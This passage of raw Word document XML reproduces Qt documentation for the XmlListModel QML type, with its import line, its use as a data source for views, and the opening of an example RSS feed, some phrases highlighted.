      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>qtquick</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>xmllistmodel</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>xmllistmodel</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="00BE3BBD" w:rsidRDefault="002736BE" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1337" w:name="_Toc483000814"/>
      <w:bookmarkStart w:id="1338" w:name="_Toc483003812"/>
      <w:bookmarkStart w:id="1339" w:name="_Toc483604162"/>
      <w:bookmarkStart w:id="1340" w:name="_Toc483605382"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XmlListModel QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1337"/>
      <w:bookmarkEnd w:id="1338"/>
      <w:bookmarkEnd w:id="1339"/>
      <w:bookmarkEnd w:id="1340"/>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use this element, you will need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1632" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XmlListModel </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="00490E7E" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1633" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is used to create a </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read-only model from XML data</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be used as a </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data source for view elements</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1634" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1635" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1636" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) and other elements </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that interact with model data</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1637" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Repeater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if there is a XML document at http://www.mysite.com/feed.xml like this:</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml version</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"1.0"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"utf-8"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?&gt;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tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;rss</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2.0"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;channel&gt;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;item&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A blog post</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;pubDate&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sat, 07 Sep 2010 10:00:01 GMT</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/pubDate&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/item&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;item&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Another blog post</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;pubDate&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sat, 07 Sep 2010 15:35:01 GMT</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
